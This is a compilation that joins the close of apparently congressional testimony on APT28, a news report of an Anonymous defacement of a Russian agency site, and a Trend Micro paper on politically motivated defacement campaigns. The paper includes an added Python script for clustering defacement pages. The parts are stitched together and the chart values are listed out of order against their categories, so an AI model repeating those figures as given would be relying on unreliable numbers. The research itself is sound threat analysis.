We also examined forensic details that were left behind, such as the specific IP addresses or email addresses from spear phishing attacks, file names, MD5 hashes, timestamps, custom functions, encryption algorithms, or backdoors that may have command and control IP addresses or domain names embedded. Targeting was also critical to our assessment. Knowing the types of organizations, individuals, or data that a threat group targets provided us with insight into the group's motivations and objectives. Gathering this type of data about a group typically requires visibility into the group's operational planning, their initial attacks or infection attempts, or into actual victim environments. We track all of the indicators and significant linkages associated with identified threat groups in a proprietary database that we have developed over many years comprised of millions of nodes and linkages between groups, and then analyze this information carefully in the context of the relevant political and cultural environment to develop our assessments. Based on our extensive collected intelligence and analysis in this instance, we have determined that APT28\xe2\x80\x99s cyber operations are consistent with government sponsorship and control. Specifically, APT28 has relied upon a steady supply of sophisticated tools that would only have been available to a nation-state or state- protected contractor, pursued targets where Russian interests would be high, maintained a level of activity over several years requiring significant financial and personnel resources with no clear profit motive, and closely integrated its cyber attacks into broader propaganda efforts of benefit to a nation-state actor. There are alternative explanations for APT28\xe2\x80\x99s sponsorship, however in our view these only appear plausible for explaining one incident at a time, and are not credible in the context of the totality of APT28\xe2\x80\x99s operations. 
By combining an increasingly wide range of technical intelligence, hands-on remediation of compromised systems, and an understanding of Russia's geopolitical aims based on its own public statements, our confidence in assessing Russian government sponsorship or control of APT28 has only grown since release of our initial report in 2014. Moreover, the activities of APT28 are not consistent with any basic criminal activities to which we have responded, nor are they consistent with those perpetrated by a lone actor. The size of the infrastructure, the targeted information, the amount of malware and the totality of the sophistication suggest a long-term, well-resourced espionage campaign in which Russia is the benefactor. In summary, while we do not have pictures of a building, names of individuals, or a government agency to name, our assessment is supported by evidence of long-standing, focused operations that indicates a Russian government sponsor and government capability.

4. Recommendations to Prevent and Mitigate the Threat Posed by Such Cyber Operations.

Today, and into the foreseeable future, it is our view that the United States will face a motivated, technically sophisticated, and well-resourced adversary intent on accessing our private data, and potentially leaking it publicly. While many organizations are actively trying to counter these attacks, there currently exists a sizeable gap between what their safeguards can prevent and the ability of motivated attackers to circumvent those safeguards. Therefore, we will need to explore ways, both within and outside the cyber domain, to help deter these attacks. Of course, all enterprises – private sector or government – should work to accurately assess their own risk profiles, and utilize updated technology and best practices to protect their networks and systems.
However, organizations cannot buy, hire or train their way to perfect security, and we must consider effective deterrence and proportional response outside of the cyber domain as well. While diplomacy is not often cited as a primary tool in this arena, evidence collected regarding Chinese activity appears to reinforce its potential effectiveness. We conducted a comprehensive study of 182 compromised U.S. targets by 72 Chinese cyber threat groups going back to 2013, and we saw a sharp decline in these operations after September 2015 – when President Obama and President Xi met and specifically agreed to curtail cyber operations for commercial benefit. To be sure, Chinese cyber operations for traditional espionage remain, and US companies are still targeted for the security, political, economic, and military intelligence that Beijing seeks. However, it appears that the agreement had an impact, demonstrating that diplomacy, coupled with public-private sector collaboration, can also be a useful tool for reducing the cyber threat both countries face. This experience leaves me optimistic that with the combined efforts of both governments and the private sector, diplomatic engagement with Russia and other nations to restrict harmful cyber activity would be enforceable.

In addition to Russia, North Korea and Iran have been tied to a series of escalating attacks that go back several years. We have been surprised by the audacity of the sponsoring nation and their willingness to surpass "redlines" that we previously believed were established. It is entirely reasonable to suspect that these nations are emboldened by each other's behavior, and it is important to note that any response to the Russian cyber activities discussed today will likely be assessed by other countries.
Again, we applaud the leadership shown by this Committee to bring important issues such as those discussed today to light, and we in the private sector look forward to continuing to work with you to disseminate and support industry best practices and encourage adoption of comprehensive and effective cybersecurity programs across government and industry. I look forward to answering your questions today.

* * *
'Anonymous' Hackers Deface Russian Govt. Site to Protest Web-Blocking (NSFW) - TorrentFreak

By Andy on May 12, 2018

In retaliation for mass blocking that targeted Telegram but caused widespread collateral damage, hackers have hit the website of Russia's Federal Agency for International Cooperation. The attackers, who signed off as 'Anonymous', left a not-safe-for-work rant criticizing local telecoms watchdog Roscomnadzor. Meanwhile, Telegram filed an appeal challenging a Supreme Court ruling concerning the surrender of encryption keys.

Last month, Russian authorities demonstrated that when an entity breaks local Internet rules, no stone will be left unturned to make them pay, whatever the cost. The disaster waiting to happen began when encrypted messaging service Telegram refused to hand over its encryption keys to the state. In response, the Federal Security Service filed a lawsuit, which it won, compelling Telegram to do so. With no response, Roscomnadzor obtained a court order to have Telegram blocked.

In a massive response, Russian ISPs – at Roscomnadzor's behest – began blocking IP addresses on a massive scale. Millions of IP addresses belonging to Amazon, Google and other innocent parties were rendered inaccessible in Russia, causing chaos online. Even VPN providers were targeted for facilitating access to Telegram, but while the service strained under the pressure, it never went down and continues to function today.
In the wake of the operation there has been some attempt at a cleanup job, with Roscomnadzor announcing this week that it had unblocked millions of IP addresses belonging to Google.

"As part of a package of the measures to enforce the court's decision on Telegram, Roskomnadzor has removed six Google subnets (more than 3.7 million IP-addresses) from the blocklist," the telecoms watchdog said in a statement. "In this case, the IP addresses of Telegram, which are part of these subnets, are fully installed and blocked. Subnets are unblocked in order to ensure the correct operation of third-party Internet resources."

But while Roscomnadzor attempts to calm the seas, those angered by Russia's carpet-bombing of the Internet were determined to make their voices heard. Hackers attacked the website of the Federal Agency for International Cooperation this week, defacing it with scathing criticism combined with NSFW suggestions and imagery.

"Greetings, Roskomnadzor," the message began. "Your recent destructive actions towards the Russian internet sector have led us to believe that you are nothing but a bunch of incompetent mindless worms. You shall not be able to continue this pointless vandalism any further."

Signing off with advice to consider the defacement as a "final warning", the hackers disappeared into the night after leaving a simple signature. "Yours, Anonymous," they wrote.

But the hackers weren't done yet. In a NSFW cartoon strip that probably explains itself, 'Anonymous' suggested that Roscomnadzor should perhaps consider blocking itself, with the implement depicted in the final frame.

"Anus, block yourself Roscomnadzor"

But while Russia's attack on Telegram raises eyebrows worldwide, the actions of those in authority continue to baffle.
Last week, Prime Minister Dmitry Medvedev's press secretary, Natalia Timakova, publicly advised a colleague to circumvent the Telegram blockade using a VPN, effectively undermining the massive efforts of the authorities. This week the head of Roscomnadzor only added to the confusion.

Effectively quashing rumors that he'd resigned due to the Telegram fiasco, Alexander Zharov had a conversation with the editor-in-chief of radio station 'Says Moscow'. During the conversation, which took place during the Victory Parade in Red Square, Zharov was asked how he could be contacted. When Telegram was presented as a potential method, Zharov confirmed that he could be reached via the platform.

Finally, in a move that it's hoped could bring an end to the attack on the platform and others like it, Telegram filed an appeal this week challenging a decision by the Supreme Court of Russia which allows the Federal Security Service to demand access to encryption keys.

Tagged in: Roscomnadzor, Telegram
A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks

A TrendLabs Research Paper

Marco Balduzzi, Ryan Flores, Lion Gu, and Federico Maggi, with Vincenzo Ciancaglini, Roel Reyes, and Akira Urano
Trend Micro Forward-Looking Threat Research (FTR) Team

TREND MICRO LEGAL DISCLAIMER

The information provided herein is for general information and educational purposes only. It is not intended and should not be construed to constitute legal advice. The information contained herein may not be applicable to all situations and may not reflect the most current situation. Nothing contained herein should be relied on or acted upon without the benefit of legal advice based on the particular facts and circumstances presented and nothing herein should be construed otherwise. Trend Micro reserves the right to modify the contents of this document at any time without prior notice. Translations of any material into other languages are intended solely as a convenience. Translation accuracy is not guaranteed nor implied. If any questions arise related to the accuracy of a translation, please refer to the original language official version of the document. Any discrepancies or differences created in the translation are not binding and have no legal effect for compliance or enforcement purposes. Although Trend Micro uses reasonable efforts to include accurate and up-to-date information herein, Trend Micro makes no warranties or representations of any kind as to its accuracy, currency, or completeness. You agree that access to and use of and reliance on this document and the content thereof is at your own risk. Trend Micro disclaims all warranties of any kind, express or implied.
Neither Trend Micro nor any party involved in creating, producing, or delivering this document shall be liable for any consequence, loss, or damage, including direct, indirect, special, consequential, loss of business profits, or special damages, whatsoever arising out of access to, use of, or inability to use, or in connection with the use of this document, or any errors or omissions in the content thereof. Use of this information constitutes acceptance for use in an "as is" condition.

for Raimund Genes (1963-2017)

Contents
Our Approach to the Investigation 5
Targets and Methods of Website Defacers 7
Real World Conflicts Reflected in Cyberspace 11
Auxiliary Activities of Defacement Groups 54
Conclusion 58

Web attacks—attacks that compromise internet assets like mail servers, cloud infrastructures, and websites—are troubling phenomena. The research community has put considerable effort into investigating these incidents but has mostly focused on detecting attacks and not delving into the reasons behind these attacks. Of course, the typical cybercriminal's goal is to profit. They might compromise websites to push ransomware, or they could try and steal data—recent breaches show that information is an increasingly valuable commodity. But, as this paper discusses, more emotional motivations, such as patriotism, specific real-world events or simply hacktivism, can also trigger compromises.

Web defacement hacktivism is the practice of subverting a website with the goal of promoting a specific agenda or political ideology. Methods may vary, but when hacktivists compromise a website, the usual tactic involves replacing the original page with their version—a practice that is called web defacement.
Hacktivism is mainly linked to web defacement, but a hacktivist (the attacker) can also be involved in traffic redirection (from a legitimate site to an attacker-owned site), denial of service (a form of service disruption), and malware distribution to support their particular cause. Dedicated websites like Zone-H collect evidence of web defacements, and defacers can voluntarily advertise their compromise by submitting a report.

Elaborating on the reasons behind web defacements at scale is not as easy as it seems. While someone could theorize that geopolitical events and conflicts influence cybercriminals' attacks against websites and their choice of victims, corroborating this phenomenon requires large-scale analysis. Our examination of over 13 million web defacement reports against websites spans over 18 years, covering multiple continents. We designed an internal system that gathers, analyzes, and clusters these millions of reports. As we identify the major campaigns of these defacers, we can provide further insights into how geopolitical events are reflected in web defacements. We also look at how different factors, such as the political beliefs and the defacers' religious inclination, can trigger and affect these attacks.

Our first two sections provide high-level insights into our dataset of defacements, as well as some defining facts about the targets and tactics used by the defacers. Our next section on Real World Impact breaks down seven top campaigns that have affected Israel, France, India, Syria, Kosovo, and countries surrounding the South China Sea. We delve into specific conflicts in those areas and the defacements that happened in the aftermath. The succeeding sections cover the hacking groups' affiliations and how their collectives are organized—some collectives are formed across continents, and some are a loose collection of local hackers.
Recruitment tools and the methods used to distribute hacking techniques are also discussed. The final sections discuss other activities that defacers take part in, and how the current activities may evolve. Recently, there have been incidents of hackers who have gone from simple web defacement to activities supporting cybercrime. There is a real possibility that defacers and defacement groups will start to escalate their activities, move away from ideological motivations, and turn to cybercrime.

Our Approach to the Investigation

Our objectives include exploring motivations and influences behind website defacements, focusing on how geopolitical events act as triggers for web defacement activities. To better understand these dynamics globally, we gathered web defacement reports from third-party sources and processed them with an automated system we designed specifically for this purpose. Each web defacement report consists of:

1. Meta-information on the defacement, such as timestamp, website URL, the defacer's name, vulnerability, and more.
2. The deface page planted by the defacer (or modified, if this is the case). The deface page comes in the form of source code (HTML/JS/CSS) and may contain small-sized external resources such as images. Additional content is fetched dynamically at analysis time.

Our system automatically analyzes each deface page via two components:

1. A static-code analyzer that extracts representative features (i.e., characteristics) from the page (like title, length, and encoding) in an offline manner.
2. A dynamic-code analyzer that renders the page with a headless browser and extracts additional features in an online fashion. This analyzer works better with dynamically generated pages (e.g., when a link is generated via JavaScript) or pages with external content like embedded streams of songs.
The output of these components is a set of features that describe the page at a high level. These features are used as input for the following component: the campaign detector. The campaign detector looks for defacements that—we believe—are conducted by the same actor or criminal group. This is often the case with campaigns wherein multiple actors unite and conduct defacements that relate to each other, such as those with similar target choices or deface pages. In fact, defacers enlisted in the same campaign are usually provided with a template for rendering similar deface pages. These templates provide consistency in promoting the criminal group and spreading the campaign's propaganda and motivations.

This component groups similar pages accordingly and represents them in the form of clusters of web defacement campaigns. For this process, we make use of machine learning. We apply unsupervised learning to a set of features that summarizes the pages well; these are received from the static and dynamic analyzers mentioned before. The process automatically detects new campaigns and labels them for inspection.

The result of this processing is indexed in an Elasticsearch back end and visualized via a web console. For each campaign, the console allows the analyst to inspect information like the lifespan of the campaign, the composition of the deface pages, as well as that of their actors. The console also allows analysis of how criminal groups are organized and if/when a certain actor belongs to multiple groups or moves from one to another. We will discuss the details of our system in a follow-up paper that will be released later in the year.
Targets and Methods of Website Defacers

As previously stated, our work is based on a large-scale analysis of 13 million website defacements that we collected from the following data sources:

• Zone-H: 12,303,240 defacement incidents
• Hack-CN: 386,705 defacement incidents
• Mirror Zone (now offline): 195,398 defacement incidents
• Hack Mirror: 68,980 defacement incidents
• MyDeface (now offline): 37,843 defacement incidents

Figure 1. The rate of web defacement records per year (chart covering 1998 to 2016; y axis 0 to 2M)

The total number of unique defacers is 104,135, and the total number of unique compromised domains is 9,929,484. Note that one domain can have multiple incidents recorded.

Figure 2. Operating systems of defaced websites (categories as extracted: Win 2008, Win 2000, Unknown, Win 2003, Linux; values as extracted: 338,306; 402,076; 637,392; 1,548,583; 9,074,567)

Figure 3. Web servers of defaced websites (categories as extracted: Unknown, IIS/5.0, Unspecified, nginx, IIS/6.0, Apache; values as extracted: 244,402; 334,898; 757,306; 1,525,578; 8,541,048)

Based on the metadata voluntarily provided by the defacers (which we cannot validate), here is a visual representation of the class of vulnerabilities leveraged by the attackers:

Figure 4. The methods of hacking as reported by defacers, based on defacement ID information (categories as extracted: Other Modes; RPC Server Intrusion; Web Server External Module Intrusion; Shares Misconfiguration; Remote Administrative Panel Access through Bruteforcing; SSH Server Intrusion; Access Credentials through Man In the Middle Attack; URL Poisoning; Social Engineering; FTP Server Intrusion; Brute Force Attack; Web Server Intrusion; Undisclosed Vulnerability; Configuration/Administrative Error; Other Web Application Bug; Other Server Intrusion; Not Available; Attack Against the Administrator/user (password stealing/sniffing); Known Vulnerability (i.e. unpatched system); SQL Injection; File Inclusion Vulnerabilities. Values as extracted: 393,361; 80,013; 88,038; 88,403; 107,890; 114,470; 126,368; 135,700; 163,579; 252,612; 257,069; 276,443; 417,961; 493,698; 809,062; 842,693; 1,087,984; 1,114,541; 1,167,414; 1,268,272; 2,384,043)

The Role of Social Media

We observed that defacers voluntarily leave contact information upon compromise, based on the features (i.e., characteristics) automatically extracted during the analysis of the deface pages. It seems to be common practice for attackers that push propaganda to advertise their beliefs and refer their "viewers" to social networking sites or provide contact emails of the group. Overall, we found that emails and Twitter are the primary forms of advertisement, with 25% (email) and 8% (Twitter) of pages displaying at least one of these. In fact, 6% of pages have multiple contact emails. In contrast, the telephone seems to be an unloved form of contact—only 3% of our attack records have telephone information. This is not a surprising percentage, since a telephone number may expose the defacer to attribution.

Another interesting aspect of propaganda-driven attacks on websites is the addition of streaming—songs played in the background of the page or even visual aspects. Our data found that 32% of the defacements have an embedded URL referencing either a streaming provider (like YouTube) or an audio file hosted on an external resource that is most likely another compromised machine. We manually investigated some of these cases and confirmed that most of these songs are related to religion.
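The pipeline sketched in "Our Approach to the Investigation" (a static analyzer that turns each deface page into features, followed by a campaign detector that clusters pages built from the same template) and the contact and streaming features counted in "The Role of Social Media" can be illustrated with a small script. The following Python is an added example written for this page, not Trend Micro's system or code: the three sample pages, the team name, e-mail address, Twitter handle, telephone number and media URLs in them are all constructed, and Jaccard similarity over each page's visible vocabulary with a fixed threshold stands in for the paper's unsupervised learning. The dynamic (headless-browser) analyzer is not reproduced.

```python
"""Toy static analyzer and campaign clusterer for web defacement pages.
Added illustration, not the paper's system: extract per-page features
(title, length, contacts, hashtags, streaming media), then group pages
whose visible text overlaps into campaign clusters."""
import re
from html.parser import HTMLParser
from itertools import combinations

# Constructed sample deface pages; team name, e-mail, handle, phone number
# and media URLs are hypothetical.
SAMPLE_PAGES = {
    "site-a": (
        "<html><head><title>Hacked by TeamAlpha</title></head><body>"
        "<h1>Hacked by TeamAlpha</h1><p>We are against injustice. #OpExample</p>"
        "<p>contact: alpha@example.com | @team_alpha</p>"
        "<iframe src='https://www.youtube.com/embed/abc123'></iframe></body></html>"),
    "site-b": (  # same template as site-a, without the embedded video
        "<html><head><title>Hacked by TeamAlpha</title></head><body>"
        "<h1>Hacked by TeamAlpha</h1><p>We are against injustice. #OpExample</p>"
        "<p>contact: alpha@example.com | @team_alpha</p></body></html>"),
    "site-c": (  # unrelated page: telephone contact and external audio file
        "<html><head><title>Owned</title></head><body>"
        "<p>Security is an illusion. Patch your servers. tel: +1-555-0100</p>"
        "<audio src='http://203.0.113.7/song.mp3'></audio></body></html>"),
}

EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
HANDLE_RE = re.compile(r"(?<![\w@])@([A-Za-z0-9_]{1,15})\b")  # Twitter-style handle
HASHTAG_RE = re.compile(r"#\w+")
PHONE_RE = re.compile(r"\+?\d[\d\s().-]{6,}\d")
STREAM_HOSTS = ("youtube.com", "youtu.be", "soundcloud.com")
AUDIO_EXT = (".mp3", ".ogg", ".wav")


class _PageText(HTMLParser):
    """Collect the <title>, the visible text chunks and embedded media src URLs."""

    def __init__(self):
        super().__init__()
        self.title, self.chunks, self.media = "", [], []
        self._in_title = False

    def handle_starttag(self, tag, attrs):
        if tag == "title":
            self._in_title = True
        elif tag in ("iframe", "audio", "video", "embed", "source"):
            src = dict(attrs).get("src")
            if src:
                self.media.append(src)

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data
        else:
            self.chunks.append(data)


def extract_features(html):
    """Static-analyzer stand-in: one feature dict per deface page."""
    page = _PageText()
    page.feed(html)
    visible = " ".join(c.strip() for c in page.chunks if c.strip())
    return {
        "title": page.title.strip(),
        "length": len(html),
        "emails": sorted(set(EMAIL_RE.findall(visible))),
        "twitter": sorted(set(HANDLE_RE.findall(visible))),
        "phones": sorted({m.group().strip() for m in PHONE_RE.finditer(visible)}),
        "hashtags": sorted(set(HASHTAG_RE.findall(visible))),
        "streaming": [u for u in page.media
                      if any(h in u for h in STREAM_HOSTS) or u.lower().endswith(AUDIO_EXT)],
        # vocabulary of the visible text, used for template similarity
        "tokens": set(re.findall(r"[a-z]{3,}", visible.lower())),
    }


def jaccard(a, b):
    return len(a & b) / len(a | b) if (a or b) else 0.0


def cluster_campaigns(pages, threshold=0.5):
    """Union-find over pages whose vocabularies overlap by at least `threshold`.
    Returns (clusters, features); clusters are sorted lists of page names."""
    feats = {name: extract_features(html) for name, html in pages.items()}
    parent = {name: name for name in feats}

    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]  # path halving
            x = parent[x]
        return x

    for a, b in combinations(feats, 2):
        if jaccard(feats[a]["tokens"], feats[b]["tokens"]) >= threshold:
            parent[find(a)] = find(b)
    groups = {}
    for name in feats:
        groups.setdefault(find(name), []).append(name)
    return sorted(sorted(g) for g in groups.values()), feats


def contact_summary(feats):
    """Percentage of pages carrying each kind of contact detail or media."""
    n = len(feats)

    def pct(key):
        return round(100 * sum(1 for f in feats.values() if f[key]) / n)

    return {"email_pct": pct("emails"), "twitter_pct": pct("twitter"),
            "phone_pct": pct("phones"), "streaming_pct": pct("streaming")}


if __name__ == "__main__":
    clusters, feats = cluster_campaigns(SAMPLE_PAGES)
    print("campaign clusters:", clusters)
    print("contact summary:", contact_summary(feats))
```

On the constructed input, site-a and site-b share a template and land in one cluster while site-c stays alone, and the summary reports the share of pages with e-mail, Twitter, telephone and streaming features in the same spirit as the percentages above. The regular expressions are deliberately simple; a production analyzer would also record encoding and the rendered DOM, and would cluster on several features rather than vocabulary alone.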
Real-World Conflicts Reflected in Cyberspace

Mass attacks, or attacks that typically use automated hacking tools to compromise as many websites as possible indiscriminately, are common across the web. But in the course of our research, we noted a more coordinated form of attack that we labeled "campaigns". In a campaign, the attackers launch specific attacks as a reaction to certain events, to push an agenda, make known their grievances, or spread political messages.

Our system allowed us to identify the top seven campaigns connected to and motivated by real-world conflicts. In the graph below, the horizontal (X) axis pertains to the number of attackers participating in a particular campaign, while the vertical (Y) axis maps the number of hacktivism-related defacements on record. The data shows that the #OpIsrael campaign attracted the largest number of attackers, while Free Kashmir has the largest number of defacements. We will delve deeper into these campaigns in the succeeding sections.

Figure 5. Overview of the top seven defacement campaigns from collected data (x axis: number of attackers, 0 to 500; y axis: number of defacements, 0 to 20K; campaigns plotted: Free Kashmir, #opisrael, #savesyria, #antiserbs, #opindia, #opfrance, South China Sea)

Conflicts Spark Anti-Israel Defacement Campaigns

So far, we've identified three major anti-Israel web defacement campaigns. The first (and the longest) is #OpIsrael, which is composed of several campaigns supported by different groups. Then there is the #OpSaveGaza campaign, which is a short but highly effective defacement campaign in reaction to Israel's Operation Protective Edge. Last is #OpBader / #ElectronicBader / #BaderOperation, a loosely organized campaign with multiple groups participating that has gained traction since May 2016.
Figure 6. #OpIsrael, #opsavegaza and #opbader / #electronicbader / #baderoperation timelines (chart covering 30/09/2011 to 31/08/2016; y axis 0 to 1,200)

The struggle between Israel and Palestine is one of the longest modern-day conflicts, starting in 1948 and continuing to this day. Israel's continued occupation of the West Bank and military operations in Gaza only serve as fuel to the anger of Palestinians and other groups sympathetic to Palestine.

These defacements are not random. As much as possible, the hacking groups target Israeli websites, as co.il and org.il top-level domains (TLDs) rank second and sixth respectively in the distribution of defaced websites carrying anti-Israel messages.

Figure 7. Target sites for #OpIsrael (chart titled "Target TLDs of #OpIsrael Defacements"; y axis 0 to 6K)

#OpIsrael

The very first #OpIsrael web defacement was made by "imLulzPirate" on August 26, 2012. The website myisrael.us fell victim to the defacement, with the main page of the website altered to display a politically charged message against Israel and Zionism. The defacement embeds a YouTube video uploaded by Canadians for Justice and Peace in the Middle East, condemning the Gaza War in December 2007 – January 2008.

Figure 8. The first #OpIsrael defacement made by imLulzPirate

#OpIsrael did not gain any traction after the initial defacement made by imLulzPirate. It took several months for members of the Anonymous collective to support the cause and organize a campaign against Israeli websites. The first organized large-scale defacement campaign happened on April 7, 2013, a date chosen because it coincides with Holocaust Remembrance Day.
This attack has been repeated every year since then, with 326 defacers executing 11,000-plus defacements on more than 5,400 domains.

#OpIsrael Sub-campaigns

#OpIsrael Engaged is a sub-campaign that started in 2015 and continued up to 2016. Similar to the main #OpIsrael campaign, it peaked every April 7. The AnonGhost team, a tight-knit group that claims to have members from Mauritania, Morocco, Malaysia, Indonesia, Tunisia, USA, and Ireland, mostly did the 2015 campaign. Anonymous Arabe, a loose group of hackers from Arabic-speaking countries in the Middle East and North Africa, was responsible for the majority of the 2016 campaign.

Figure 9. Defaced pages by AnonGhost Team and Anonymous Arabe showing identical wording for the #OpIsrael Engaged campaign

It is worth noting that AnonGhost seems to have either branched out to other countries or has sub-groups, with AnonGhost being the umbrella group. So far we've seen AnonGhostDz, which is the Algerian sub-group, AnonGhost Indonesia, AnonGhost Gaza, AnonGhost Tunisia, AnonGhost Maldives, and AnonGhost Vietnamese.

#OpIsrael Decided is another sub-campaign that started around the same time as #OpIsrael Engaged, and uses a similar message. It is supported mostly by an AnonCoders team that is a loose association of hackers from Albania, Tunisia, Morocco, Lebanon, Bangladesh, Indonesia, and France, among others.

Figure 10. #OpIsrael Decided defacement pages show similar wording to #OpIsrael Engaged

#OpBader / #ElectronicBader / #BaderOperation

This is a larger campaign with 2,759 defacement records, which is as many as the #OpIsrael Engaged and #OpIsrael Decided sub-campaigns combined.
While #OpIsrael Engaged and #OpIsrael Decided had standard templates (and the participating hackers did not do much to alter these templates), #OpBader is loosely organized, with templates and messages that vary quite significantly. The only common identifiable string we can find related to this campaign is the use of these hashtags: #opisrael #alfallagaTeam #fallaga #fallagateam #tunisianfallagateam #opbader #electronicBader #baderoperation #hackers #fallagahackers

"Bader" is a reference to the Battle of Badr, a significant battle won by the Prophet Muhammad in the early years of Islam. These historical references strongly indicate that these hacking groups view themselves as cyber-jihadists, viewing their actions as part of a digital jihad.

#OpSaveGaza

The #OpSaveGaza/#SaveGaza campaign is related to #OpIsrael since both target Israel and Israeli actions in Palestinian territories, but #OpSaveGaza/#SaveGaza is mostly influenced by events in the Gaza region specifically. In July 2014, Israel launched Operation Protective Edge, which included airstrikes and a land invasion aimed at destroying tunnels from Gaza to Israel. Not surprisingly, the first instance of #OpSaveGaza/#SaveGaza appeared in response to the land invasion. The defacements continued until October, and only when hostilities in the Gaza strip subsided significantly did the 2014 campaign die down. #OpSaveGaza had 3,415 defacements within that short period, making it one of the most active web defacement campaigns.

Figure 11. Sample defacement pages of the #OpSaveGaza campaign

#Save Gaza

#Save Gaza started in July of 2016 as a sub-campaign under #opBader, primarily driven by Anonymous Ghost Gaza. Among the sub-campaigns discussed, it has been the most vocal and the most forceful.
While #OpIsrael Decided and #OpIsrael Engaged use relatively tame language, #Save Gaza incites violence and puts direct pressure on Israelis, threatening to steal credit card information, bank credentials, and other website credentials.

Figure 12. Forceful language in the defacement campaign #Save Gaza

It is worth noting that Anonymous Ghost Gaza followed through on their threat to steal the personal information of Israeli citizens. Members of Anonymous Ghost Gaza posted Israeli citizens' credit card information and online account credentials on their Facebook page and Pastebin.

Figure 13. Hacking groups publicly expose Israeli citizens’ information and financial details

Groups behind the Campaigns

Hackers and hacking groups participating in #OpIsrael campaigns are mostly from Arabic-speaking countries in the Middle East and North Africa, with other groups from Bangladesh, Malaysia, and Indonesia also participating. Note that these are countries that do not recognize the validity of Israel as a state.

Figure 14. Top 15 participating hacking groups and hackers: Mohamad Bseso, DexmoD, AnonGhost GAZA, fallaga team, Anonymous Arabe, MrHax, Fallaga Team, Dr.T3rr0r, Memberal_Force, Hitch, |N|ewbieC27, VandaThe God, Black Worm, CapoO_TunisiAnoO

The common use of the name "fallaga" by hackers and hacking groups in North Africa is a reference to "felaghas" or "fellagha", armed groups that were instrumental in driving out the French from Algeria in the Algerian War, which lasted from the 1950s to the early 1960s.

Charlie Hebdo Aftermath Results in #OpFrance

On January 7, 2015, two men attacked Charlie Hebdo, a French magazine that had caused controversy several times in the past through its satirical cartoons about Islam and the prophet Muhammad.
The attack left 12 people dead and 11 injured.[10] In the aftermath, France was a target of other attacks, this time in cyberspace. The smaller campaigns under #OpFrance include #OpCharlie, #OPCHARLIEHEBDO, and #AntiCharlieHebdo.

Figure 15. Timeline of #OpFrance—activity peaked January to March 2015, right after the Charlie Hebdo attacks (chart: weekly defacement counts, 0 to 350, from 1/4/2015 to 9/25/2016)

Target TLDs of #OpFrance Defacements

Similar to the attacks against Israel, #OpFrance hackers were trying to target French websites, as evidenced by .fr domains having the second-most domains that had sites defaced.

Figure 16. Target sites for #OpFrance (chart: defacement counts per TLD, 0 to 500; TLDs shown, in descending order: com, fr, org, ru, dk, net, nl, com.br, de, info, com.ua, eu, co.uk, pl, be, ca, gr, com.ar, in, gouv.fr)

This campaign focused on French websites, with defacers targeting sites of companies like the French supermarket Carrefour, or sites with .fr TLDs. From our data, 36% of #OpFrance defacements have .fr TLDs.

Figure 17. Defacement pages for the #OpFrance campaign

Hacking groups from Muslim-majority countries such as Tunisia, Syria, Mauritania, Morocco, Bangladesh and Indonesia began targeting French websites in an #OpFrance web defacement campaign that appeared to be in support of the attacks.
Some of the defacements even paraphrased Saudi-Australian Islamic preacher Junaid Thorne's statement on the matter, “If you want to enjoy 'freedom of speech' with no limits, expect others to exercise 'freedom of action.'”

Figure 18. Defaced page promoting Islamic preachers’ statement on Charlie Hebdo

Even though several groups were part of #OpFrance, the Middle East Cyber Army was particularly active and did the majority of the defacements. This group includes members that belong to other hacking groups such as Anonymous Arabe, and some hackers from North Africa. It is worth noting that one suspected member of the Middle East Cyber Army was arrested several months after the January – March #OpFrance campaign. The Bulgarian police arrested a 21-year-old Syrian student residing in Bulgaria, believed to be the leader of the group.[11] Based on the defacement pages of the Middle East Cyber Army, the hacker with the alias "The Greatest" was the one arrested. The group modified their defacement pages to include #OPSaveTheGreatest after the arrest.

Figure 19. Defaced page modified to support “The Greatest”, who was supposedly arrested in Bulgaria

Groups Behind the Campaigns

The visualization below shows the Middle East Cyber Army to be the most active group behind #OpFrance. AnonGhost, which was active in the anti-Israel defacements, also widely participated, as well as hackers from Mauritius (Mauritania Coder), and some from Bangladesh and Indonesia.

Figure 20. Top 15 participating hacking groups and hackers: Middle East Cyber Army, Mauritania coder, MrAhSan HaXor, Hani Xavi, ZeSn, Rexal, Scooterist, BL4CK-T3RRORIST, Casablanca Haxorz, Hexlook, Amine Moodz, AnoaGhost, Owner Dzz, Prosox, Mr.bz, AnonGhost

Indian Border Disputes Trigger Campaigns

Like Israel, India has unresolved territorial disputes with its neighbors and sees frequent clashes along its borders. The unresolved dispute with Pakistan regarding Kashmir and Jammu, as well as the challenges of patrolling and enforcing the border between India and Bangladesh (the fifth longest land border in the world), make for a volatile situation. It is further exacerbated by constant defacements between Pakistani and Indian hacking groups, and between Bangladeshi and Indian hacking groups.

Figure 21. Target sites of #OpIndia (chart titled "Target TLD’s of #OpIndia": defacement counts per TLD, 0 to 500; TLDs shown, in descending order: com, in, ac.in, co.in, org, net, org.in, edu.in, gov.in, co, info, net.in, biz, lk, ch, com.ar, hu, Other, biz.id, by)

The hackers targeted Indian websites, as evidenced by the TLDs .in, ac.in, co.in, org.in, edu.in and gov.in being among the top nine domains with websites defaced.

Cricket leads to #riseofthetigers

Even cricket teams became a trigger for defacement campaigns, illustrating the degree of tension between India and its two neighbors. The campaign #OpIndia started in March 2015, executed by Bangladeshi hackers, after Indian politician Shashi Tharoor tweeted that he preferred to face the Bangladesh cricket team (called The Tigers) in the Cricket World Cup quarterfinals. Tharoor reportedly felt Bangladesh was a weaker team that would give India an easier path to the finals.

Figure 22. Defacement page for #OpIndia with an image of the Bangladesh cricket team featured

Figure 23. The Tharoor tweet that started the controversy

Free Kashmir

Led by Pakistani hacking groups ZCompany Hacking Crew (ZHC) and Muslim Liberation Army, Free Kashmir is a long-standing campaign that started in 2011.
The attacks began by calling out the illegal occupation and human rights abuses the Indian Armed Forces committed against Kashmiris.[12] Free Kashmir has the most defacements out of all the campaigns studied, despite having only around half the number of attackers that #OpIsrael had.

Pakistan is India's rival claimant to the disputed territory of Kashmir, and the defacement pages of both ZHC and Muslim Liberation Army commonly quote India's Penal Code Act No. 45 of 1860, which does not include the State of Jammu and Kashmir as part of India. However, the ruler of Jammu and Kashmir, Maharaja Hari Singh, acceded both territories to India in 1947.[13]

Figure 24. Free Kashmir campaign defacements

